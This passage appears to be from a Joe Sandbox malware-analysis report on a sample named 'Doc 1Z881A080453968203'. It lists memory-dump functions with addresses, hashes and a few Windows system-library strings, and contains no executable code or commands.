                                        Uniqueness Score: -1.00%

                                        Function 017A6420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID: 0-3916222277
                                        • Opcode ID: 80afecf5ce689db4cbf6bbfc53c9aa34c1b6e98d144cf924243cc296c8425e95
                                        • Instruction ID: e6fd89486bf55db7baa08dd12fdcf986ebaafdc7ff06a4cab2d0b80dc0653251
                                        • Opcode Fuzzy Hash: 80afecf5ce689db4cbf6bbfc53c9aa34c1b6e98d144cf924243cc296c8425e95
                                        • Instruction Fuzzy Hash: D1919272940219AFEB21DF94CD85FAEFBB8EF58750F540165F600AB195D774AD00CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 017CE10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID: 0-3916222277
                                        • Opcode ID: 5e2dc08243945d72dbb1970f71d5b313dc090f16e32d314ad1eaaa3bdaf691a9
                                        • Instruction ID: 78d84c9edf698a3cf8cdf2bc16bb59007bba98319b16c986d52c20030ad652e1
                                        • Opcode Fuzzy Hash: 5e2dc08243945d72dbb1970f71d5b313dc090f16e32d314ad1eaaa3bdaf691a9
                                        • Instruction Fuzzy Hash: D6917072901649AFDB22ABA5DC48FAFFF7AEF85B50F10002DF501A7251EB74A901CB51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0175A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: GlobalTags
                                        • API String ID: 0-1106856819
                                        • Opcode ID: 78921aa5910605e59f2cb985d8be83f28cce63a6220b54431d3bad1ab8056cf8
                                        • Instruction ID: b58ee1a6311c1ae20e2d66f15cbf8d822e0e9ea5aff8a023d18d1f09d6bc7bb2
                                        • Opcode Fuzzy Hash: 78921aa5910605e59f2cb985d8be83f28cce63a6220b54431d3bad1ab8056cf8
                                        • Instruction Fuzzy Hash: E47160B5E0020A9FDF28CF9CE590AADFBB1BF48710F14826EF905AB245E7719945CB50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 017C4978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: .mui
                                        • API String ID: 0-1199573805
                                        • Opcode ID: 1bba803433581530f2d33e745760bf986e85442fe9e5c9bf16f4102a88465cf5
                                        • Instruction ID: b43c0b8c344bcb9c09fb3db9db4954580171aa29c2d3c979181e33ba472d20bc
                                        • Opcode Fuzzy Hash: 1bba803433581530f2d33e745760bf986e85442fe9e5c9bf16f4102a88465cf5
                                        • Instruction Fuzzy Hash: F5519C72D0022ADBDB10DF9DD854AAEFBB4AF08F50F05416EEA12BB254D3349D01CBA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0173E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: EXT-
                                        • API String ID: 0-1948896318
                                        • Opcode ID: 5cdb6adbe25e606278d503117ec4eaa6dd161ab24c07e5bf5fc972d832897e47
                                        • Instruction ID: efd5843aef838ffb2ec29d22b7bfa9a209583a2626ee88f5456fd93e4cfea7a7
                                        • Opcode Fuzzy Hash: 5cdb6adbe25e606278d503117ec4eaa6dd161ab24c07e5bf5fc972d832897e47
                                        • Instruction Fuzzy Hash: C941A0725083169BD722DA75C844BABFBE8AFC8714F04092DFA84E7181EB74D904C797
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0179C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: BinaryHash
                                        • API String ID: 0-2202222882
                                        • Opcode ID: 85dbadb722f4fd83cbe14d8cc4a1bd6aef55d60694ad72464c86c9e79917d9ca
                                        • Instruction ID: e7619280901aa4b5581a27708df533cc6afe36f773f073f6e86c43d4470e76ea
                                        • Opcode Fuzzy Hash: 85dbadb722f4fd83cbe14d8cc4a1bd6aef55d60694ad72464c86c9e79917d9ca
                                        • Instruction Fuzzy Hash: 3C4162B1D0022DAEDF21DB50DC84FDEF77CAB44714F0045A5AB08AB145DB709E888FA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 017B6B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: #
                                        • API String ID: 0-1885708031
                                        • Opcode ID: fac41f26736cfb4a68d0ad763c8fb23dd1e5af034697dfc82880305e9c27bf5c
                                        • Instruction ID: b3f84210d92c9709e29ef309312cdd939782f527da144a47024e5e49e212d910
                                        • Opcode Fuzzy Hash: fac41f26736cfb4a68d0ad763c8fb23dd1e5af034697dfc82880305e9c27bf5c
                                        • Instruction Fuzzy Hash: EB310531A007199BEB22DF69C894BEEFBB8DF45704F144068FA45AB282DB75ED05CB50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0179CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: BinaryName
                                        • API String ID: 0-215506332
                                        • Opcode ID: 06985b685cfadeb34c43cc3e69979a438c63ebdc30d7c27b2aed52256df45fe5
                                        • Instruction ID: a18ef6f5ee8c1b62f4cd8f612f696ce074dd49b5d16868ffe456a716a9411bc3
                                        • Opcode Fuzzy Hash: 06985b685cfadeb34c43cc3e69979a438c63ebdc30d7c27b2aed52256df45fe5
                                        • Instruction Fuzzy Hash: F3310336900515AFEF16DB58D845E7FFB74EB80760F014169A905AB291D7309E08EBE0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 017A892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                        Download Yara Rule
                                        Strings
                                        • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 017A895E
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                        • API String ID: 0-702105204
                                        • Opcode ID: 07db58fffb1655e15748fc6ca74c1823628dc34df3b7eaa3469d37ff5aba1a13
                                        • Instruction ID: e12fd571fead50e5b09d6e6fd561b46269c75837e558d974914eaf9a1ed8d91a
                                        • Opcode Fuzzy Hash: 07db58fffb1655e15748fc6ca74c1823628dc34df3b7eaa3469d37ff5aba1a13
                                        • Instruction Fuzzy Hash: 64012B732002119BE7216B59CC88E96FF69EFC6755B84022CF78506559CB246882CB93
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 017C2000 Relevance: .8, Instructions: 757COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 57cdefb0f4f11a8237b61ac2cb20159d934f0be5ad168fe21db98a18a2b246ed
                                        • Instruction ID: 97ec14549b2f282836cc629e00522456579741ba0f8ca51d020da1a4436ceb96
                                        • Opcode Fuzzy Hash: 57cdefb0f4f11a8237b61ac2cb20159d934f0be5ad168fe21db98a18a2b246ed
                                        • Instruction Fuzzy Hash: D442D2766083419FE725CF68C890A6BFBE5BFC8B40F18092DFA8297252D770D945CB52
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 017B8158 Relevance: .6, Instructions: 617COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8c9557d20437300e072d43b3986131d588f5f358d4dd505fe58ac39c23388ab1
                                        • Instruction ID: 71a1ead87f07317500e1e874433b712355e7a394e111563f06fc769464fcb846
                                        • Opcode Fuzzy Hash: 8c9557d20437300e072d43b3986131d588f5f358d4dd505fe58ac39c23388ab1
                                        • Instruction Fuzzy Hash: F8424D75A102198FEB24CF69C881BEDFBF9BF48304F188199E949EB242D7349985CF51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01732840 Relevance: .6, Instructions: 605COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 530f8cdc33212ab1e2993d299b8f07f1ec0781b04c91f7597c727d5cd3b7b4c9
                                        • Instruction ID: b43ae686c2182e96e1084eaf4d94d3af3f027e43e54e6f2f9e4865f07666ea20
                                        • Opcode Fuzzy Hash: 530f8cdc33212ab1e2993d299b8f07f1ec0781b04c91f7597c727d5cd3b7b4c9
                                        • Instruction Fuzzy Hash: 6E32F070A40755AFEB25EF69C8487BEFBF2BF84304F24411DE58A9B285D735A842CB50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 017CA118 Relevance: .6, Instructions: 591COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1e26f049440275490d572b9a03668b25a7259032d540685343598b349f21061b
                                        • Instruction ID: 4ae8b1277a4f1497b5cc96fab624c2b81cbe4d1919f89a15483374f7d94650db
                                        • Opcode Fuzzy Hash: 1e26f049440275490d572b9a03668b25a7259032d540685343598b349f21061b
                                        • Instruction Fuzzy Hash: 0B22AD706046698BEB25CF2DC094772FBF1BF84B02F18849ED9868B286F735D552DB60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01726A50 Relevance: .5, Instructions: 548COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1e1badbf8bdad0999ab27d951a97233c0866533ffbe4347e902f488df20b4ef5
                                        • Instruction ID: 0ddf44e4240fc6dc4a600ebd960d571f9509ee258f4b418eb5470495567e89ea
                                        • Opcode Fuzzy Hash: 1e1badbf8bdad0999ab27d951a97233c0866533ffbe4347e902f488df20b4ef5
                                        • Instruction Fuzzy Hash: D0329F71A04215CFDB25DF68C480BAAFBF1FF48310F2485AAE956AB755D734E842CB50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01744A35 Relevance: .4, Instructions: 423COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                        • Instruction ID: 9721b5e01ae2eb0bafb21969d6708c399d3bf107ccd0a0786175bb3ca6c9a106
                                        • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                        • Instruction Fuzzy Hash: 60F17071E0021A9BDB15DFA9C584BAEFBF5BF48710F088129EA46AB345E734D841DB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 017B892B Relevance: .4, Instructions: 386COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ffc500d34c74022769c7bf59303a07c662f8c94dad7b31676c9607c77afed80a
                                        • Instruction ID: 444b36b14249ee1f9a8dc10e92bbb23e2a0e7e0a27f9d195f6c5bd1b8689ce56
                                        • Opcode Fuzzy Hash: ffc500d34c74022769c7bf59303a07c662f8c94dad7b31676c9607c77afed80a
                                        • Instruction Fuzzy Hash: 9AD1E171A0060A8BDF15CF69C881BFEF7F9AF88304F1881AAD955E7241D735EA05CB61
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 017265D0 Relevance: .4, Instructions: 383COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ff05cc1aa86abf4c5069811eb92ba7621a0a9531e3e1850c45421237f08e2816
                                        • Instruction ID: ccbe04446b6093c0de2c51b1b71074fcea9298715a671d7af77c1df27869e052
                                        • Opcode Fuzzy Hash: ff05cc1aa86abf4c5069811eb92ba7621a0a9531e3e1850c45421237f08e2816
                                        • Instruction Fuzzy Hash: 2DE16B71608352CFC715DF28C490A6AFBE0BF89314F15896EF99587352EB31E906CB92
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01718397 Relevance: .4, Instructions: 380COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1738452c25bf83169ff9dc3706694474d3ba86e9094cf308f0253cea8f2e6f88
                                        • Instruction ID: 5cc4ea796fa55ace53f6aaf07122a5d34fbdef9a8ac48347a906ba0713462d21
                                        • Opcode Fuzzy Hash: 1738452c25bf83169ff9dc3706694474d3ba86e9094cf308f0253cea8f2e6f88
                                        • Instruction Fuzzy Hash: C9D1EF71A002069BDF14DF6CC880ABAF7A5BF54314F14466DEA16DB288EB34E951CB62
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 017A8243 Relevance: .3, Instructions: 322COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                        • Instruction ID: d623bdc20124b2e94263ff13738f51357e4db6214912d9809230375a038651a2
                                        • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                        • Instruction Fuzzy Hash: 22B1BE75A00605AFEB24DF98C944BABFBB9BFC4305F90462DAA4297394DA30E905CB11
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01730535 Relevance: .3, Instructions: 300COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                        • Instruction ID: c2094183a5523e73012e033723a4f7dfb41a39ebd0bcabb5032f9140a1097150
                                        • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                        • Instruction Fuzzy Hash: 0BB1E531604646AFDB26DB68C854FBEFBF6AF84300F280199E552D7386DB70E941DB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 017283C0 Relevance: .3, Instructions: 281COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cd56ee4c4050a41608baf072da25c3f418e885f64266ba054cf11be1333a8829
                                        • Instruction ID: da7fb99e1c3d095bbfcd58ab7e874d5a139ff70be9b325233726a6df487ccaa3
                                        • Opcode Fuzzy Hash: cd56ee4c4050a41608baf072da25c3f418e885f64266ba054cf11be1333a8829
                                        • Instruction Fuzzy Hash: 36C166702083818FE764DF19C494BABF7E4BF88304F54496DE98987291E775EA09CF92
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0171C427 Relevance: .3, Instructions: 280COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 087e748dd28097af80d0bcca7c190cf246af3f879e78f326df6a74ec66ec27c5
                                        • Instruction ID: 988fcff5d82b4b5e6ef6969dfcf36f7d438e0c40c30f93ac00d11697c8e41a60
                                        • Opcode Fuzzy Hash: 087e748dd28097af80d0bcca7c190cf246af3f879e78f326df6a74ec66ec27c5
                                        • Instruction Fuzzy Hash: A5B17070A402668BEB75CF68C880BADF7B5EF44700F1485E9D50AE7285EB70DD85CB21
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0174E5E7 Relevance: .3, Instructions: 278COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 07c345be85de48878c5e7b566201de9a1ccf5a1946e19aba8b80063f2040e8c7
                                        • Instruction ID: 188991f072076a5147c2e248b41ecc058eda3bd3857a9c64f25a64bf63d4ab27
                                        • Opcode Fuzzy Hash: 07c345be85de48878c5e7b566201de9a1ccf5a1946e19aba8b80063f2040e8c7
                                        • Instruction Fuzzy Hash: A8A10831E406159FEB22EB6CC848FADFBB4FB41724F150165EA41AB291DB789E40CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01760185 Relevance: .3, Instructions: 276COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5731b741abe93caa5cf0aa13a85c340b19c06b75fbf2c06e3dbd8f9b56b79135
                                        • Instruction ID: 0a8e8d5f18d13c9ff991e977b7f7fcc39d7ea4e8eb07f3d42be652a36e77dcd4
                                        • Opcode Fuzzy Hash: 5731b741abe93caa5cf0aa13a85c340b19c06b75fbf2c06e3dbd8f9b56b79135
                                        • Instruction Fuzzy Hash: 4BA1D071B016169FEB25CF69D994BAAFBB9FF44314F10402DEE0597281EB34E815CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 017F4500 Relevance: .3, Instructions: 275COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 954c02d474f10d2ed02cca660ed3cc9af5ec203f0f101cec44a491e4f30fb0c2
                                        • Instruction ID: 7279c3148844472d2515d42ada9479fe2bf873a2ab00441392b9c8ef8424d6d8
                                        • Opcode Fuzzy Hash: 954c02d474f10d2ed02cca660ed3cc9af5ec203f0f101cec44a491e4f30fb0c2
                                        • Instruction Fuzzy Hash: 1BA1BC72A042129FC721DF18C984B6BFBE9FF48714F15096CE6869B756D334E901CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 017A60E0 Relevance: .3, Instructions: 264COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8bf9d0b7cd024688c99de58f15d88da3fcddf8f87171fc4791659d6e5613a378
                                        • Instruction ID: b5e7b84019ce338960b60bec5f85cd23cc05fa70a8fbd7ac8b4c1d42ee910d87
                                        • Opcode Fuzzy Hash: 8bf9d0b7cd024688c99de58f15d88da3fcddf8f87171fc4791659d6e5613a378
                                        • Instruction Fuzzy Hash: 0E91C271D00216AFDB15CFA8D894BAEFFB5AF88710F594269F610EB341D734E9019BA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0173E3F0 Relevance: .3, Instructions: 261COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 05880d1db63d4cac4cbf4aea3e690056b97b7adea2a74b5ac866410241a92fd5
                                        • Instruction ID: 1f408eb1742e668f50a86b955493343fc85211ab2aa520e0199596286f7d0cb8
                                        • Opcode Fuzzy Hash: 05880d1db63d4cac4cbf4aea3e690056b97b7adea2a74b5ac866410241a92fd5
                                        • Instruction Fuzzy Hash: 2E913532A00216DBEB24EB58C884B79FBA1EFD4714F2540A5EA45DB386FA34D941CB51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01776ACC Relevance: .2, Instructions: 226COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2865e10e10b60524e6f7beb7f5fbeb003391d1ddc5b25335a7f100b0fa67dcd0
                                        • Instruction ID: 942f6c03b2b29fd27ac77865360f989e3382d32422042efb37c2430f7e1f1386
                                        • Opcode Fuzzy Hash: 2865e10e10b60524e6f7beb7f5fbeb003391d1ddc5b25335a7f100b0fa67dcd0
                                        • Instruction Fuzzy Hash: AE818271A006169BEF24CF69C940ABEFBF9FB48700F14852EE555E7645E334E940CBA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 017EAB40 Relevance: .2, Instructions: 222COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                        • Instruction ID: 1c79033b699f32c3a3a3e399c38cf9041d190b9034f5749619e294261570adc9
                                        • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                        • Instruction Fuzzy Hash: E1819231A0020A9FDF19CF98C898AAEFBF2FF88310F188569D9169B355D774E951CB50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0175E284 Relevance: .2, Instructions: 212COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_16f0000_Doc 1Z881A080453968203.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4037a0cc4d87648b691c698f33837fb9cb10dfbb2934fb8da1b66f70c71ed8b9
                                        • Instruction ID: 6a68e2faaedcf7262ddfd1bedae27d4e0cbbfe2e3c02ba15601097efab4a3c8b
                                        • Opcode Fuzzy Hash: 4037a0cc4d87648b691c698f33837fb9cb10dfbb2934fb8da1b66f70c71ed8b9
                                        • Instruction Fuzzy Hash: 83818D71A00609AFDB61CFA9C880AEEFBBAFF48344F10442DE955A7211DB70AD45CB60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0173C640 Relevance: .2, Instructions: 206COMMON
                                        Download Yara Rule
                                        Memory Dump Source
